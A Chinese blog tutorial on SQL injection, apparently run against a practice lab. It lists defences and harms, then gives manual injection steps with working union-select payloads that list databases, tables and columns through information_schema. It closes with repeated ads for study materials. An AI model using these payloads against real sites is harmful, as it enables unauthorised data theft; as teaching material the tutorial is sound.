赞
踩
可以利用SQLmap进行SQL注入的检查或利用,也可以使用其他SQL注入工具。也可以手工测,利用单引号、and 1=1以及字符型注入进行判断。
(1)SQL 语句预编译和绑定变量
(2)所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到 SQL 语句中。当前几乎所有的数据库系统都提供了参数化 SQL 语句执行接口,使用此接口可以非常有效的防止 SQL 注入攻击。
(3)对进入数据库的特殊字符( ’ <>&*; 等)进行转义处理,或编码转换。
(4)确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为 int 型。
(5)数据长度应该严格规定,能在一定程度上防止比较长的 SQL 注入语句无法正确执行。
(6)网站每个数据层的编码统一,建议全部使用 UTF-8 编码,上下层编码不一致有可能导致一些过滤模型被绕过。
(7)严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害.
(8)避免网站显示 SQL 错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
(1)未授权下操作数据库中的数据
(2)恶意篡改页面内容
(3)获取管理员密码,添加系统账号
(4)上传webshell,进一步提权,然后进行内网横向渗透
判断注入点
判断注入点类型
猜解SQL查询语句中的字段数(order by)
获取当前数据库(select database)
获取数据库中的表
获取表中的字段名
获取数据
注入点能和数据库进行交互的地方
GET传参一般把数据放在URL中,POST传参一般吧数据放在HTML,HEADER提交,在URL中看不到,一般通过抓包在repiter中来回注入,或者利用SQLmap
URL中:id?=num、搜索框、表单
select * from news id =1 (不存在闭合)
数字型注入点
’ //触发条件错误,返回数据库记录
1 and 1 =1 //永真条件,返回记录
1 and 1 = 2 //永假条件,不返回记录
如果满足以上条件,则存在SQL注入漏洞,程序没有对整形参数合法性做过滤或判断
select * from news wher author='admin'(可能有单引号,需要闭合)
字符型注入
1‘ //触发错误,返回数据库错误
1’and’1’='1 //永真条件,返回记录
1’and’1’='2 //永假条件,不返回记录
程序没有对提交的字符型参数的合法性做过滤或判断
注入点是一个搜索框,随便输入一点内容然后提交,提交内容会显示在URL上,那么这个使用的是GET型传参方式。
我们可以使用火狐浏览器插件——HackBar来方便我们的手工注入操作。可以看到URL后面跟着一个?id=1&Submit=Submit#,那么我们可以判断出,这个id=1就是我们的注入点位置。
首先使用数字型判断方法,判断过程略 ,判断结果并不是数字型,那么有可能是字符型
使用order by语句进行查询
?id=1' order by 1,2,3 --+&Submit=Submit#
查到order by 3的时候返回报错,说明数据库有2个字段
id=1'union select 1,database() --+&Submit=Submit#
这里我选择数据库root
?id=1' union select 1,table_name from information_schema.tables where table_schema=database()
#特殊情况补充
如果出现以上这种情况就是编码出现了问题了,那么解决办法有两种:
1)在原有的union select 1,table_name from上的table_name前加上hex()进行十六进制编码。
即:id=1’ union select 1,hex(table_name)from information_schema.tables where table_schema=database() --+
再将输出的表名进行十六进制解码即可
2)在table_name后加上collate utf8_general_ci,可以直接得到明文
?id=1' union select 1,column_name from information_schema.columns where table_schema=database() and table_name='users' --+ &Submit=Submit#
如果查字段也出现了编码错误,同样使用hex编码和强制转码
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
rcvv5ni-1715546095090)]
[外链图片转存中…(img-ojS78uoH-1715546095091)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。